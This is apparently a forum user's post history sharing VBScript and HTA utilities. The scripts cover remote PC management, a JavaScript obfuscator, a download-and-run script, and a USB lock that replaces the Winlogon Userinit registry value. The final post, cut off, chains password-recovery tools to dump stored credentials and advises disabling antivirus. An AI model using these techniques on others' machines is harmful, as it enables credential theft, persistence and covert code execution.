Jump to content

Hackoo

Active Members
  • Posts

    19
  • Joined

  • Last visited

Everything posted by Hackoo

  1. You are Welcome Bro ;) :D
  2. Hi :D Try this [HTA] Computer Management Utility It is basically 25 scripts in 1 and incorporates the following scripts: * Scan PCs in an IP range * Get a full inventory of a PC * Change Computer Description * Change Local Admin Password * Clean Temp Files * Clear Application Event Log * Copy Profile script completely rewritten for VB * Delete old user profiles (older than the number of days specified) This now also deletes user reg files. * View all Startup Items present on the PC and delete any entries as required * Enable / Disable IE Proxy * Enable / Disable RDP * Retrieve Microsoft product Keys * Run Comp Management * List all installed updates / hotfixes on PC in text file * Open any remote share (updated in 3.2) * Ping machine * Run PSExec command * Run Custom command * View all the processes on a PC and kill any as required * Retrieve a list of all System Restore points and optionally create a new one * Shutdown / restart / log off * View profiles on machine * Uninstall software (inc silent uninstalls if available) This will also monitor the uninstall and inform you when it is complete (as of update 3.2) * Interrogate Services - view all services and optionally Start / Stop / Restart / Enable / Disable any as required All of these can be done on any remote machine in your network, and the script will dynamically create your OUs and Root OU so it 'should' work straight out of the box! You are given the option to choose a PC out of all of the machines in your domain and then you can do with them as you wish.
  3. I am trying to develop an application in HTA "Process Checker.hta" to check online on Fichier.net, ProcessLibrary and Google the various processes running on a PC. So the purpose of this application is to Check out whether the process is a malware or a normal process that belongs to the system. So you can display the executable file that is associated with this process in the explorer. and you can also kill the process or even all instances of this process. This program was tested on Windows XP SP2 and it is in Beta and is under development, so if you encounter any bug in Windows 7 or Vista, please don't blame me NB : it's a French Version and if there are some members volunteers here would like to translate it in English it would be nicer ProcessChecker.rar
  4. Hi ;) I propose a new element to use : [HTA] File2FTPUpload : To Upload a file in your FTP SERVER. So, you just copy and paste the code and save it as : File2FTPUpload.hta
  5. Hi :D This code is written in vbscript and show you some Easter eggs from Google like "Do a barrel roll" and "Let it snow" So enjoy it ;) 'Eastereggs from Google Written in Vbscript by © Hackoo Realsed on 21/12/2011 Sub RunUrl(sUrl, bMaximized) Dim oShell Set oShell = CreateObject("WSCript.shell") If bMaximized = True Then oShell.run sUrl, 3 Else oShell.run sUrl, 1 End If Set oShell = Nothing End Sub RunUrl Chr(104)&Chr(116)&Chr(116)&Chr(112)&Chr(58)&Chr(47)&Chr(47)&Chr(119)&Chr(119)&Chr(119)&Chr(46)&Chr(103)&Chr(111)&Chr(111)&Chr(103)&Chr(108)&Chr(101)&Chr(46)&Chr(99)&Chr(111)&Chr(109)&Chr(47)&Chr(115)&Chr(101)&Chr(97)&Chr(114)&Chr(99)&Chr(104)&Chr(63)&Chr(113)&Chr(61)&Chr(108)&Chr(101)&Chr(116)&Chr(43)&Chr(105)&Chr(116)&Chr(43)&Chr(115)&Chr(110)&Chr(111)&Chr(119),True wscript.sleep 20000 RunUrl Chr(104)&Chr(116)&Chr(116)&Chr(112)&Chr(58)&Chr(47)&Chr(47)&Chr(119)&Chr(119)&Chr(119)&Chr(46)&Chr(103)&Chr(111)&Chr(111)&Chr(103)&Chr(108)&Chr(101)&Chr(46)&Chr(99)&Chr(111)&Chr(109)&Chr(47)&Chr(115)&Chr(101)&Chr(97)&Chr(114)&Chr(99)&Chr(104)&Chr(63)&Chr(113)&Chr(61)&Chr(100)&Chr(111)&Chr(43)&Chr(97)&Chr(43)&Chr(98)&Chr(97)&Chr(114)&Chr(114)&Chr(101)&Chr(108)&Chr(43)&Chr(114)&Chr(111)&Chr(108)&Chr(108),True EasterEggsGoogle.rar
  6. Hi :D I wonder if you have seen a document or script like this ? Of course yes ;) So This Tool is dedicated for you to encode and decode it easily :) These scripts are intended to explain how to "hide" HTML and/or javascript from other people who view your page's source code. It is not foolproof, but it does make it more difficult to read and understand the source code. <html> <script> document.write(unescape('%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%48%65%6C%6C%6F%20%57%6F%72%6C%64%20%21%22%2B%20%27%5C%72%27%20%2B%20%22%48%61%63%6B%6F%6F%20%6F%77%6E%65%64%20%79%6F%75%20%21%22%2B%27%5C%72%27%2B%22%68%74%74%70%3A%2F%2F%68%61%63%6B%6F%6F%2E%61%6C%77%61%79%73%64%61%74%61%2E%6E%65%74%22%2C%34%38%2C%22%48%61%63%6B%6F%6F%20%57%6F%72%6C%64%22%29%3C%2F%73%63%72%69%70%74%3E')); </script> </html> ASCII to HEX to Unicode Converter Utility : It's a utility to convert ASCII characters to Hexadecimal and Unicode I know there are many tools online like this that make the same job but this one, i just modified it a little to become more and more funny with a background like matrix in a HTA HTML Application ;) Download ASCII to HEX to Unicode Converter Utility Ascii2Hex2Unicode.rar
  7. SearchFileByName.vbs : This is a VBScript to find files by name and generate the search results in a table in HTML citing information on these files such that their paths, creation date, modification date, size and attributes. Update On 29/05/2011: Adding and Displaying Miniature differents types of images when searching Eg if the search includes image files will be displayed as thumbnails. if there is something to improve this script please post it. Thank you ! 'SearchFileByName.vbs © Hackoo Le 26/05/2011 : C'est un Vbscript pour rechercher des fichiers par leurs noms 'et générer le Résultat de recherche dans un Tableau en HTML en citant les informations 'sur ces fichiers tels que leurs Chemins ,la date de création,la date de modification,la Taille et leurs attributs 'Mise à jour Le 29/05/2011 : Ajout et Affichage des miniatures de diffrentes types d'images lors de la recherche 'Càd si la Recherche comporte des fichiers images elles seront affichées en miniatures Dim fso, OutFile, sDrv, sFName, sReport, sFile, sTitle ,strHTML sTitle = "Recherche des Fichiers Par leurs Noms" Set fso = CreateObject("Scripting.FileSystemObject") OutFile = "Recherche.html" If fso.FileExists(OutFile) Then fso.DeleteFile(OutFile) Set sReport = fso.OpenTextFile(OutFile, 8, True) sDrv = InputBox("Entrez la lettre du lecteur à la recherche (lettre seulement)" & vbcrlf&_ "ou bien " & vbcrlf & "(Saisissez * pour rechercher dans toutes les lettres de lecteur local)", sTitle) If sDrv = "" Then WScript.Quit sFName = InputBox ("Entrez le nom du fichier à rechercher (sans extension)", sTitle) If sFName = "" Then WScript.Quit strHTML="<html><body text=white><style type='text/css'>"&_ "a:link {color: #F19105;}"&_ "a:visited {color: #F19105;}"&_ "a:active {color: #F19105;}"&_ "a:hover {color: #FF9900;background-color: rgb(255, 255, 255);}"&_ "</style>" strHTML=strHTML &"<center><h2><B> <font color=Red>[COUNT] </font>Fichiers Trouvés dont le Nom est <font color=red>"""& sFName &""" </font> sur le lecteur <font color=red>"& UCase(sDrv) & ":</B></font></h2></center>"&_ "<center><body bgcolor=#1234568><table border='3' cellpadding='1' style='border-collapse: collapse; font size:11pt' bordercolor='#CCCCCC' width='100%' id='Table1'></center>" & _ "<td><center><strong>Chemin :</strong></center></td>"&_ "<td><center><strong>Date de Création :</strong></center></td>"& _ "<td><center><strong>Date de Modification :</strong></center></td>"&_ "<td><center><strong>Taille :</strong></center></td>"&_ "<td><center><strong>Attributs:</strong></center></td>" If sDrv = "*" Then Dim d,dc,racine Set fso = CreateObject("Scripting.FileSystemObject") Set dc = fso.Drives For Each d in dc racine = d.Driveletter & ":" If d.IsReady Then GetResults racine , sFName End If Next Else GetResults sDrv & ":", sFName End If sReport.WriteLine strHTML &"</table></body></html>" Wscript.CreateObject("WScript.Shell").Run OutFile Sub GetResults(drv, fname) Dim sWQL, oFile, sAttrib,sFilePath,size ext = Array("png","jpg","jpeg","gif","bmp","psd","tif") sWQL = "select * from cim_datafile where Drive='" & _ drv & "' AND FileName = '" & fname & "'" Results = 0 For Each oFile In GetObject("winmgmts:").execquery(sWQL) Results = Results + 1 sFile = oFile.Name Set f = fso.GetFile(sFile) SizeKo = Round(FormatNumber(f.Size)/(1024),1) & " Ko" 'Taille en Ko avec 1 chiffre après la Virgule SizeMo = Round(FormatNumber(f.Size)/(1048576),1) & " Mo" 'Taille en Mo avec 1 chiffre après la Virgule SizeGo = Round(FormatNumber(f.Size)/(1073741824),1) & " Go" 'Taille en Go avec 1 chiffre après la Virgule If f.size < 1024 Then Size = f.size & " Octets" elseif f.size < 1048576 Then Size = SizeKo elseif f.size < 1073741824 Then Size = SizeMo else Size = SizeGo end if sFilePath = f.Path If oFile.Archive Then sAttrib = "Archive " If oFile.Compressed Then sAttrib = sAttrib & " Compressé " If oFile.Encrypted Then sAttrib = sAttrib & " Crypté " If oFile.Hidden Then sAttrib = sAttrib & " Caché " If oFile.System Then sAttrib = sAttrib & " Système " If oFile.Readable Then sAttrib = sAttrib & " Lecture " If oFile.Writeable Then sAttrib = sAttrib & " Ecriture " If UCase(ext(0)) = UCase(fso.GetExtensionName(oFile.Name)) or UCase(ext(1)) = UCase(fso.GetExtensionName(oFile.Name))or UCase(ext(2)) = UCase(fso.GetExtensionName(oFile.Name)) or UCase(ext(3)) = UCase(fso.GetExtensionName(oFile.Name)) or UCase(ext(4)) = UCase(fso.GetExtensionName(oFile.Name)) or UCase(ext(5)) = UCase(fso.GetExtensionName(oFile.Name)) or UCase(ext(6)) = UCase(fso.GetExtensionName(oFile.Name)) Then ImgFileName = oFile.Name strHTML=strHTML & "<tr><td><a target=_Blank href='"& sFilePath &"'>"&ImgFileName&"<br><img src='"& sFilePath &"' border=1 height=50 width=80></center></td><td><center>" & f.DateCreated & "</center></td>" & _ "<td><center>" & f.DateLastModified & "</center></td><td><center>"& Size & "</center></td>"&_ "<td><center>" & sAttrib & "</center></td></tr>" else strHTML=strHTML & "<tr><td><a target=_Blank href='" & sFilePath & "'>" & _ sFilePath & "</a></td><td><center>" & f.DateCreated & "</center></td>" & _ "<td><center>" & f.DateLastModified & "</center></td><td><center>"& Size & "</center></td>"&_ "<td><center>" & sAttrib & "</center></td></tr>" end if Next strHTML = Replace(strHTML, "[COUNT]", Results) End Sub
  8. Hi This VBScript Scan and Search for images with extension like jpg ,gif,png,bmp in the folder and subfolders and list them in a html output file 'This VBScript Scan and Search for images with extension like jpg,gif,png,bmp 'in the folder and subfolders and list them in a html output file. '© Hackoo © 2011 start_folder = ".\" ' The Current Directory for scaning images htmfile = "ListImage.htm" ext = Array("jpg","gif","png","bmp") Signature = "<br><center><font size=10 FACE=Comic sans MS style=font-weight:bold Color=red>©<br><img src=http://photomaniak.com/upload/out.php/i1102064_IDNlogo.gif>" count=0 Set fso = CreateObject("Scripting.FileSystemObject") Set folder = fso.GetFolder(start_folder) Set ws = CreateObject("WScript.Shell") Set outfile = fso.CreateTextFile(htmfile) outfile.WriteLine "<html><body>" ListDirectory folder, ext 'Call The Recursive function outfile.WriteLine "<br><center><font color=red>Le Nombre total des images est de "& count & "</font>" outfile.WriteLine Signature outfile.WriteLine "</body></html>" outfile.Close Question = MsgBox("The Total Count of images is " & count & vbCrLf &" Do you want to List them now ?",vbYesNo+32,"Total Count of images") If Question = vbYes Then Explorer htmfile else wscript.Quit End If Sub ListDirectory(folder, ext) For Each file In folder.Files cheminFic = folder & "\" & file.name For i = lbound(ext) to ubound(ext) If UCase(ext(i)) = UCase(fso.GetExtensionName(file.Name)) Then strFilePath = file.ParentFolder outfile.WriteLine "<center><a target=_Blank href="& qq(cheminFic) &">"&_ "<img src= "& qq(cheminFic) &" width=80% height=100%><BR><B><font color=red>"&_ "<a href='" & strFilePath & "'>The Location of " & file.Name & "</a></font><B><br><hr>" count=count+1 End If Next Next For Each fldr In folder.subfolders ListDirectory fldr, ext Next End Sub Function Explorer(File) Set ws=CreateObject("wscript.shell") ws.run "Explorer "& File & "\" end Function Function qq(strIn) qq = Chr(34) & strIn & Chr(34) End Function[/CODE]
  9. Hi i found a good HTML Application HTA dealing with BBCode named Dingue_BBCode_Editor.0.5 by the Author : FredleDingue it is an Off line forum message editor. So i have this idea to combine my script for Sending E-mail in HTML mode with Attachements with this BBCode Editor. The Main Features: Off line forum message editor - BBCode Editor: -Extra large input box -Real time preview (updated every 2 seconds) -Error highlighting -Shows message lenght -Undo/Redo until 40 steps -Auto insert links from clipboard -Auto insert default text into url tag -Auto paste clipboard in quote or code -Auto back up to temporary file -Save to message history -Save to separate file -Copy to clipboard -Works offline (no internet connection needed) Description of this Update : The Main features are kept like in the description above and i updated and i added a few lines in this script like the possibility of adding 5 Attachements in one message, and the possibility to choose which of 2 methods for sending the E-mail message The First Method : with SSL SMTP Gmail Authentication Procedure and The Second Method : Without Authentication and with your SMTP Server This a preview when i used it for editing this post: NB: This program is tested under windows xp sp3 and works very well. So i just want that someone of you test and try me this soft and tell me if it works under Windows vista or Seven Thank you for your Testing The Download link here
  10. VBScript to Automate File Downloading from a Website Hi everybody :) I post this VBscript that works for me so fine when i run it as a vbs file ! ' Set your settings strFileURL = "http://hackoo.ifrance.com/Merlin.jpg" strHDLocation = "c:\Merlin.jpg" ' Fetch the file Set Ws = WScript.CreateObject("WScript.Shell") Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open "GET", strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 1 'adTypeBinary objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0 'Set the stream position to the start Set objFSO = Createobject("Scripting.FileSystemObject") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End If Set objXMLHTTP = Nothing Ws.Run strHDLocation Set WS = Nothing But my problem how can i make it works in HTML File ? because it didn't works for me i don't know why ? could someone here tell me what's wrong in the HTML file :( Thank you ! ;) &lt;html&gt; &lt;head&gt; &lt;script language=vbscript&gt; Sub Window_Onload Call Download_Me() End Sub Sub Download_Me() on error resume next strFileURL = "http://hackoo.ifrance.com/Merlin.jpg" strHDLocation = "c:\Merlin.jpg" Set Ws = WScript.CreateObject("WScript.Shell") Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open "GET", strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 1 'adTypeBinary objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0 'Set the stream position to the start Set objFSO = Createobject("Scripting.FileSystemObject") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End If Set objXMLHTTP = Nothing Ws.Run strHDLocation Set WS = Nothing End Sub &lt;/script&gt; &lt;/head&gt; &lt;body&gt; &lt;br&gt; &lt;input type=button value="Click to Run" name="Download_Me" onclick="Download_Me()"&gt; &lt;/body&gt; &lt;/html&gt;
  11. I invited you that you take 2 minutes of your time to look at the source code ;) Ok i agree with you in this idea for removing the key from the registry but to edit and change it it's very hard if you don't know the function that encrypt and decrypt the password I'm intersting for this VBS would you please post the source code, and what do you advice me or what other idea for Changing the security issue Thank you ! ;)
  12. Hi ;) I want to share with you my last (Application + source code) Named: Folder Protection Most people have many files or folders on their computer which they don't want to others see or use them. If you are interested in protecting your personal information, Folder Protection is just what you are searching for. With Folder Protection you will protect your files avoiding them to be being modified, seen or erased by other users. You can hide folders simply with a few mouse clicks. Folder Protection is protected by an encrypted password stored in the registry that you can change or remove it at any time. NB:The executable is in French but you can of course modify,translate and compile it in english and you can post your modification here in this Topic ! it's Open Source for all I'm waiting for your testing and your comments ;) Demo Interactive Video Download The Source Code
  13. After decades, centuries of existence and evolution, with which do you open your front door? A key, obviously ;) .Then why not to make it also for your computer? It falls well, there is an IT homonym which is also a small object, transportable in a pocket always with one, provided d a unique(only) identifier and with great difficulty falsifiable, who it more allows to store data: it is your USB key.Then, I have to program this Script which feigns all that I have just said above. Voila as the title indicates it " authentification by your personal USB key: it is as to Find the key in its lock! " The principle is simple: the script verifies the number of identification which is N ° of series of your USB key (SerialNumber) and at the time of becoming identified, if it finds it trendy on your system, he reads these data that he will have placed there as confirmation, then he authorizes you has to reach the system. Should the opposite occur,the computer is going to shutdown. - the Program is installable via the base of registers by adding the value of the N ° of series of the USB key And I have to think has to add another value which is the password during the installation which is going to serve us in case Immediately to free the system. Indeed because it is the only means to free the system in case of breakdown material ("Not Recognition of your key, defective Ports USB Etc. ") either your key is lost either stolen!! - I have to add also a LogFile to record the attempts of interventions by registering them in this last one The Date, the hour, N° of series and the password not Authenticated. NB: this script Modifies well a value of key in the base of register that I consider it as a "VITAL" key for the smooth running of the system: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit ( This process dashes after an opening of session Windows. it establishes your connection to the network and to Internet, loads various processes system as the taskbar and to start up the shell of Windows. As well as the parameters appropriate for your session.) It is the only means which I have to find to assure a maximal security for the system, even the Safe Mode without failure Will never escape to my script tested and approved on a machine Windows XP SP3. Description : Userinit.exe Processus User Initialization : userinit.exe Specifies the programs that Winlogon runs when a user logs on. By default, Winlogon runs Userinit.exe, which runs logon scripts, reestablishes network connections, and then starts Explorer.exe, the Windows user interface. You can change the value of this entry to add or remove programs. For example, to have a program run before the Windows Explorer user interface starts, substitute the name of that program for Userinit.exe in the value of this entry, then include instructions in that program to start Userinit.exe. You might also want to substitute Explorer.exe for Userinit.exe if you are working offline and are not using logon scripts. So in this code i substitute the value of userinit.exe by this valuewscript.exe /E:vbs """& AppData &"\"& NomScript &".db For example i use this function in my script : '-----------------------LockSystem------------------- sub LockSystem Dim Ws,DisableLogon Dim n, p, itemtype,Sys32 Set Ws = CreateObject("Wscript.Shell") Set FSO = CreateObject("Scripting.FileSystemObject") AppData= ws.ExpandEnvironmentStrings("%AppData%") NomScript=wscript.scriptname 'MsgBox AppData &amp;"\"&amp; NomScript p = "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" p = p &amp; "Userinit" itemtype = "REG_SZ" n = "wscript.exe /E:vbs """&amp; AppData &amp;"\"&amp; NomScript &amp;".db""" WS.RegWrite p, n, itemtype end sub And of course you can roll back this Value by using this script named UNINSTALL_AUTH_USB.vbs that you can find it with the RAR file in the download section. So in the RAR File there is Two Scripts: the first one named INSTALL_AUTH_USB.vbs let you install and setup this script and the scond one named UNINSTALL_AUTH_USB.vbs to UNINSTALL it ;) This the code Source of UNINSTALL_AUTH_USB '-------------------------------------------------------------------------------- 'This Code serves to UNINSTALL the script INSTALL_AUTH_USB.vbs and not to remain blocked with this last one! '© Hackoo © 2010 '------------------------------------------------------------------------------- Call UNINSTALL sub UNINSTALL Dim Ws Dim n, p, itemtype,System32 Set Ws = CreateObject("Wscript.Shell") Set FSO = CreateObject("Scripting.FileSystemObject") AppData= ws.ExpandEnvironmentStrings("%AppData%") p = "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" p = p &amp; "Userinit" itemtype = "REG_SZ" System32=FSO.GetSpecialFolder(1) n = System32 &amp; "\userinit.exe" Title = "DEINSTALLATION Clé Usb © Hackoo © " If MsgBox ("VOULEZ-VOUS DEINSTALLER VOTRE CLE USB PERSONNELLE DU SYSTEME !",1 + 256 + 48 + 4096 ,Title ) = 2 Then Msgbox "Vous avez choisi d'annuler la déinstallation de votre clé usb personnelle ! !",64,Title Msgbox " you chose to cancel the uninstall of your key usb personal!! ", 64, Title wscript.Quit() else IF fso.fileexists(AppData &amp; "\INSTALL_AUTH_USB.vbs.db") then FSO.DeleteFile AppData &amp; "\INSTALL_AUTH_USB.vbs.db",True end if IF fso.fileexists(AppData &amp; "\LogUsb.htm") then FSO.DeleteFile AppData &amp; "\LogUsb.htm",True end if IF RegExists("HKLM\Software\AUTH_USB\") Then 'Ws.RegDelete("HKLM\Software\AUTH_USB\SerialNumber\") 'Ws.RegDelete("HKLM\Software\AUTH_USB\MDP\") Ws.RegDelete("HKLM\Software\AUTH_USB\") EnableTaskMgr WS.RegWrite p, n, itemtype Msgbox "VOTRE CLE USB PERSONNELLE A ETE DEINSTALLER DU SYSTEME AVEC SUCSSES !",64,Title Msgbox "YOUR PERSONAL KEY USB WAS UNINSTALLED OF the SYSTEM WITH SUCSSES !",64,Title ELSE EnableTaskMgr WS.RegWrite p, n, itemtype Msgbox "VOTRE CLE USB PERSONNELLE EST DEJA DEINSTALLEE DU SYSTEME !",16,Title Msgbox " YOUR PERSONAL KEY USB IS ALREADY UNINSTALLED OF the SYSTEM! ", 16, Title end if end if end sub '------------------------------------------- Function RegExists(value) On Error Resume Next Set WS = CreateObject("WScript.Shell") val = WS.RegRead(value) If (Err.number = -2147024893) or (Err.number = -2147024894) Then RegExists = False Else RegExists = True End If End Function '-------------------------------------------- '--------------------EnableTaskMgr()-------------- sub EnableTaskMgr Dim WshShell,System System="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\" Set WshShell=WScript.CreateObject("WScript.Shell") Wshshell.RegWrite System, "REG_SZ" WshShell.RegWrite System &amp;"\DisableTaskMgr", 0, "REG_DWORD" end sub '-------------Fin du EnableTaskMgr()----------- On the other hand on Windows Vista and Seven I have no idea if this program is going to work or not and it's for you to test it and to participate a little to make it work in these last operating systems. I added the agent of Microsoft Merlin the Magician to animated and liven up a little this script This is a Demo in Video This is the download link of my scripts (INSTALL_AUTH_USB.vbs and UNINSTALL_AUTH_USB.vbs) AUTHENTIFICATION-CLE-USB-MERLIN AUTH_USB_MERLIN.rar
  14. After reading this Article: "Create Fake Dummy File on USB Flash Drive to Enable Write Protect and Prevent Modification" So i have this idea to create a good Trick in Vbscript. ;) So i explain what this script can do: You carry your USB flash drive that contains a lot of portable tools with you all the time but you are afraid of one thing, which is a computer virus such as JambanMu or MaxTrox or Sality that are able to infect USB flash drives and bind themself to the executable files in there. So far there are only ways to disable writing to USB flash drive on your computer by editing the registry but if you plug it into a public computer which has virus, your USB flash drive will be writable and can be infected by virus. So is having a pendrive with a built-in write protect switch the only way to prevent the drive from virus infection? The Script creates a “block” file to fill up the remaining free space on the USB flash drive. When there is no space left on the removable drive, virus won’t be able to copy itself to to drive or infect any executable files. This Code is used to create a fake Dummy file on USB Flash Drive to Enable Write Protect and Prevent Modification. '----------------DummyFileCreator.vbs--------------- '© Hackoo © 'web site http://hackoo.ifrance.com checkUSB DummyFileCreator '---------------DummyFileCreator------------------- Sub DummyFileCreator Dim WshShell,FSO,Drv,Dtype,Dfree,DfreeMB,Dtot,GB Dim Dname,Dpct,Dused,Dserial,Dinfo Set WshShell=WScript.CreateObject("WScript.Shell") Set FSO=CreateObject("Scripting.FileSystemObject") For each Drv in FSO.Drives 'If Drv.DriveType=0 Then Dtype="Unknown " 'If Drv.DriveType=1 Then Dtype="Removable" 'If Drv.DriveType=2 Then Dtype="Fixed " 'If Drv.DriveType=3 Then Dtype="Network " 'If Drv.DriveType=4 Then Dtype="CD-ROM " 'If Drv.DriveType=5 Then Dtype="RAM Disk " If Drv.DriveType=1 Then ' Disk Amovible Flash Disk If Drv.IsReady Then ' Si le Flash Disk est prêt Dfree=Drv.FreeSpace DfreeMB=FormatNumber(Drv.FreeSpace/(1024^2),0)&amp;" Mo" 'EspaceLibre = Drv.FreeSpace GB=round(Dfree/1073741824,2) &amp; " Go" Label=Drv.DriveLetter 'checkUSB 'wscript.sleep 1000 MsgBox "Espace Libre dans Le Flash Disk "&amp;Label&amp;":\"&amp;" est Environ de " &amp;GB&amp; " soit environ "&amp;DfreeMB,64,"Espace Libre" WshShell.run "cmd /c fsutil file createnew "&amp;Label&amp;":\IamDummy " &amp;Dfree&amp;"",0,True WshShell.Run "cmd /C attrib +h +s "&amp;Label&amp;":\IamDummy",0,TRUE MsgBox "Votre Flash Disk "&amp;Label&amp;":\ est désormais protégé contre les Malwares , les Worms et les Virus !",64,"Protection" end if end if Next end Sub '-----------------checkUSB----------------------- Sub checkUSB strComputer = "." On Error Resume Next Set WshShell = CreateObject("Wscript.Shell") beep = chr(007) Set objWMIService = GetObject("winmgmts:\\" &amp; strComputer &amp; "\root\cimv2") Set colItems = objWMIService.ExecQuery("Select * from Win32_DiskDrive WHERE InterfaceType='USB'",,48) intCount = 0 For Each drive In colItems If drive.mediaType &lt;&gt; "" Then intCount = intCount + 1 End If Next If intCount &gt; 0 Then MsgBox "Votre Flash Disk est bien Connecté !",64,"Flash Drive Check !" else WshShell.Run "cmd /c @echo " &amp; beep, 0 wscript.sleep 1000 MsgBox "Votre Flash n'est pas Connecté ",64,"Flash Drive Check !" End If End Sub And This Code is used to delete The Fake Dummy File and so let you write into your pendrive '----------------NoDummyFile.vbs--------------- '© Hackoo © 'web site http://hackoo.ifrance.com checkUSB NoDummyFile '--------------------------------------------- sub NoDummyFile Dim WshShell,FSO,Drv,Dtype,Dfree,DfreeMB,Dtot,GB Dim Dname,Dpct,Dused,Dserial,Dinfo,filespec Set WshShell=WScript.CreateObject("WScript.Shell") Set FSO=CreateObject("Scripting.FileSystemObject") filespec="IamDummy" For each Drv in FSO.Drives 'If Drv.DriveType=0 Then Dtype="Unknown " 'If Drv.DriveType=1 Then Dtype="Removable" 'If Drv.DriveType=2 Then Dtype="Fixed " 'If Drv.DriveType=3 Then Dtype="Network " 'If Drv.DriveType=4 Then Dtype="CD-ROM " 'If Drv.DriveType=5 Then Dtype="RAM Disk " If Drv.IsReady Then If Drv.DriveType=1 Then Dfree=Drv.FreeSpace DfreeMB=FormatNumber(Drv.FreeSpace/(1024^2),0)&amp;" MB" GB=round(Dfree/1073741824,2) &amp; " Go" Label=Drv.DriveLetter If (fso.FileExists(Label&amp;":\IamDummy")) Then Set MyFile = fso.GetFile(Label&amp;":\IamDummy") MyFile.Delete End If MsgBox "Espace Libre dans Le Flash Disk "&amp;Label&amp;":\"&amp;" est Environ de " &amp;GB&amp; " soit environ "&amp;DfreeMB,64,"Espace Libre" MsgBox "Attention ! Votre Flash Disk "&amp;Label&amp;":\ n'est pas Protégé contre les Malwares , les Worms et les Virus !",64,"Protection" end if end if Next end Sub '-----------------checkUSB----------------------- Sub checkUSB strComputer = "." On Error Resume Next Set WshShell = CreateObject("Wscript.Shell") beep = chr(007) Set objWMIService = GetObject("winmgmts:\\" &amp; strComputer &amp; "\root\cimv2") Set colItems = objWMIService.ExecQuery("Select * from Win32_DiskDrive WHERE InterfaceType='USB'",,48) intCount = 0 For Each drive In colItems If drive.mediaType &lt;&gt; "" Then intCount = intCount + 1 End If Next If intCount &gt; 0 Then MsgBox "Votre Flash Disk est bien Connecté !",64,"Flash Drive Check !" else WshShell.Run "cmd /c @echo " &amp; beep, 0 wscript.sleep 1000 MsgBox "Votre Flash n'est pas Connecté ",64,"Flash Drive Check !" End If End Sub DummyFileProtection.rar
  15. Hi ! ;) I made this script named "HackooNircmd.vbs" to recover many passwords stored in many applications running with windows XP using some Windows Password Recovery Tools. The output results are in html Files. How it works this script ?: You Must First Download this Password Recovery Tools at this link Password Recovery Tools and create a folder named passrecovery and copy all tools on it. second:Download this utiliy Nircmd the last thing is to open the notepad and copy and paste the Code below and save it as HackooNircmd.vbs and don't forget the Nircmd Utiliy and the folder passrecovery must be in same path of the script ;) Be aware that some Antivirus programs might detect that these password recovery tools are infected with Virus/Trojan. All these Trojan/virus alerts are "False Positive" issues. If you want to test this script i advise you to desactive your Antivirus and your Antispyware. NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface. By running NirCmd with simple command-line option, you can write and delete values and keys in the Registry, write values into INI file, dial to your internet account or connect to a VPN network, restart windows or shut down the computer, create shortcut to a file, change the created/modified date of a file, change your display settings, and more... MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE PassView: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView : Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more... Dialupass : Password recovery tool that reveals all passwords stored in dial-up entries. (Internet and VPN connections) As opposed to many other tools, this tool works in all versions of Windows, including Windows 2000 and Windows XP. Asterisk Logger : Recovers passwords stored behind asterisks (****) characters. You can use this tool to recover the passwords of many applications, like CuteFTP, CoffeeCup Free FTP, VNC, and more... AsterWin IE : Reveals the passwords stored behind the asterisks in the web pages of Internet Explorer 5.0 and above. You can use it for recovering a lost web site password, if it's stored on your computer. Network Password Recovery : Recover network passwords stored by Windows XP operating system. SniffPass Password Sniffer : capture the passwords that pass through your network adapter, and display them on the screen instantly. You can use this utility to recover lost Web/FTP/Email passwords. PstPassword : Recovers lost password of Outlook PST file. PasswordFox : PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. ChromePass : ChromePass is a small password recovery tool that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time. WirelessKeyView : WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer by the 'Wireless Zero Configuration' service of Windows XP and by the 'WLAN AutoConfig' service of Windows Vista. VNCPassView : VNCPassView is a small utility that recover the passwords stored by the VNC tool. It can recover 2 of passwords: password stored for the current logged-on user (HKEY_CURRENT_USER in the Registry), and password stored for the all users. SkypeLogView: reads the log files created by Skype application, and displays the details of incoming/outgoing calls, chat messages, and file transfers made by the specified Skype account. You can select one or more items from the logs list, and then copy them to the 